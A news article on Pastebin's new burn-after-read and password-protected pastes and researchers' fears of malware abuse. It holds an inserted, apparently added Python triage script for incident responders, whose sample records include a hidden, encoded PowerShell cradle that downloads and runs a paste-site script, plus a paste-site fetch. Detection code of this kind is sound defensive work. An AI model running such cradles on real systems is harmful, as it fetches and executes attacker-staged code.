Pastebin, the most popular website where users can share small snippets of text, has added two new features today that cyber-security researchers believe are going to be widely and wildly abused by malware operators.
Named “Burn After Read” and “Password Protected Pastes,” the two new features allow Pastebin users to create pastes (pieces of text) that expire after a single read or pastes that are protected by a password.
Neither of the two features is original; both have been present on many paste sites for years.
However, they are new to Pastebin, which is, by far, today’s most popular pastes portal, being ranked in the Alexa Top 2,000 most popular sites on the internet.
Pastebin has been abused in malware operations
As with anything popular, this has also attracted a lot of bad content that has been hosted on the platform. While some people use it to host pieces of code or text they want to share with a colleague, over the past decade Pastebin has also turned into a de facto hosting service for malicious code.
Across the years, malware authors have used Pastebin to store malicious commands that they retrieve and run on infected hosts, hacked data, IP addresses for malware command and control servers, and many other operational details.
Ted Samuels, an incident response (IR) consultant, told ZDNet today that it’s hard to put a number or percentage on Pastebin’s presence in malware operations, but described it as “not uncommon.”
“Pastebin is by far the most prolific ‘paste site’ and fairly popular staging ground for fileless attacks using PowerShell. For example, a threat actor’s initial payload may use PowerShell to download additional (and often obfuscated) content from pastebin.com for further execution via PowerShell. The prolific CobaltStrike framework can be loaded this way.”
To counteract Pastebin’s rising popularity among malware devs, throughout the years, cyber-security companies have created tools that scrape new Pastebin entries to search for malicious or sensitive-looking content as soon as it’s uploaded on the site. These malicious pastes are indexed in private threat intel databases that are later used for incident response, and are also reported to Pastebin to have them taken down.
But now, security researchers argue that by adding the two new features today, Pastebin is blocking their good-will efforts to detect malware operations and is catering more to the malware crowd rather than actual users and the good guys.
“Unless they’re taking measures that aren’t immediately apparent to prevent the use of Burn After Reading and Password Protection for C2 and malware staging, those would seem to be pretty helpful new features for attackers who use PasteBin for those ends,” Brian, a security researcher from Pittsburgh, told ZDNet.
But the impact of the new features goes beyond blocking real-time detection of what was uploaded to the site. They also affect post-infection IR investigations.
“This new change will now make it harder for incident responders to quickly evaluate what may have been downloaded and executed in some environments,” Samuels told ZDNet.
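To make Samuels’ point concrete, the Python below is an added example (mine, not code from ZDNet, Pastebin or the researchers quoted) of IR triage over constructed Windows process-creation records: it decodes PowerShell `-EncodedCommand` payloads, flags command lines that fetch from paste sites, and keeps the decoded script, because a burn-after-read paste cannot be re-fetched later. The record format, the sample command lines and the cradle list are assumptions; the paste hosts pastebin.com and postb.in are the ones named in this article.

```python
import base64
import re
from typing import Dict, List, Optional

# Paste sites treated as suspicious staging hosts: pastebin.com and postb.in are
# named in the article; an analyst would extend this list from their own intel.
PASTE_HOSTS = ("pastebin.com", "postb.in")
# PowerShell download/execute cradles commonly paired with paste-site staging.
CRADLE_RE = re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
                       r"DownloadFile|Net\.WebClient|Invoke-Expression|iex)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/[^\s'\"]*)?", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 over UTF-16LE)."""
    if not (m := ENC_RE.search(cmdline)):
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def paste_hosts_in(text: str) -> List[str]:
    """Return paste-site hosts referenced by any URL in the text."""
    hosts = [h.lower() for h, _path in URL_RE.findall(text)]
    return [h for h in hosts if any(h == p or h.endswith("." + p) for p in PASTE_HOSTS)]

def triage(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag a process-creation record whose PowerShell pulls from a paste site."""
    script = decode_encoded_command(event["cmdline"]) or event["cmdline"]
    hosts = paste_hosts_in(script)
    if not hosts:
        return None
    return {"host": event["host"], "paste_hosts": sorted(set(hosts)),
            "download_cradle": bool(CRADLE_RE.search(script)),
            # A burn-after-read paste is gone by the time IR looks, so the script
            # captured at execution time may be the only surviving evidence.
            "decoded_script": script}

def _enc(script: str) -> str:  # builds the constructed encoded sample below
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample records shaped like Windows process-creation logs, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "cmdline": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')")},
    {"host": "ws-02", "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "ws-03", "cmdline": "powershell.exe iwr https://postb.in/EXAMPLE -OutFile stage.txt"},
]
```

Run `[triage(e) for e in SAMPLE_EVENTS]` to see that ws-01 and ws-03 are flagged and the inventory script on ws-02 is not.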
Long-time bad blood
But the acidic reaction towards Pastebin’s two new features today is also because of the cyber-security community’s rocky relationship with the site.
Across the years, security researchers have often accused its admins of dragging their feet when asked to take down malicious pastes. Things got very heated earlier this year, in April, when Pastebin wanted to discontinue the Scraping API, a tool cyber-security researchers were using to detect new content being uploaded to Pastebin.
Pastebin backtracked on the change after massive backlash and media coverage.
It is unclear what Pastebin thinks of the cyber-security community’s latest reaction to its newest features, but in an email, the company said it added “Burn After Read” and “Password Protected Pastes” at the request of its users.
“Pastebin stores important data for our users starting from calculations and engineering data, such as algorithms, logs from various services, robots, network devices and ending with proprietary software code,” the company said.
“We have received many requests from our users to implement these features because of their privacy rights, and to help our users protect their work.”
“Pastebin was created by developers for developers, and is used globally by millions. Of course, every platform has bad actors that try to take advantage, including Github, Twitter, Facebook, Dropbox, Privnotes & Sendspace to name a few,” Pastebin said.
As Pastebin pointed out, cyber-security researchers may also be overreacting, as there are dozens of other paste sites like Pastebin, some of which are even more lenient towards abuse on their platforms than Pastebin is.
“Of course there is some overreaction from infosec Twitter, and it’s not just Pastebin. There are many paste sites with similar functionality, postb.in for example,” Samuels said.
Holding sites like Pastebin accountable for the features they support is necessary, but the two new features also have legitimate uses. If Pastebin is truly so bad, other actions should have been taken years ago.
“Pastebin and other paste websites should be blocked inside company networks,” SwitHak, a security researcher from France, told ZDNet.
“We know that it is used by bad guys. We need to act in consequence.
“We know the vector, let’s burn it and force attackers to use their own servers. If they host the malware configuration on their own servers, we can burn the attackers’ infrastructure. It’s about making the attack more complicated for the attackers, forcing them to play in our field and imposing cost,” SwitHak added.
However, Pastebin says that while the two new features might be abused, the company also has measures in place to help the good guys.
- Earlier this year, we introduced the new Enterprise API subscription to provide better data subscription for our business customers.
- Partnered with global cyber security companies for the protection of our site as well as for enriching the data of their products and services.
- Partnered with global CERTs (Computer Incident Response Center Luxembourg, Canadian Centre for Cyber Security, Austrian Energy CERT) and law enforcement agencies.
- Internally, as it relates to malicious content, in partnership with the organizations mentioned above, we take proper actions in mitigating these data.
- For researchers, academia and industry organizations approved by us, we grant this access at no cost.
- Lastly, implementation of Abuse Management and Threat Analysis teams who work closely with law enforcement and industry partners.
Updated with comments from Pastebin, as they arrived post publication.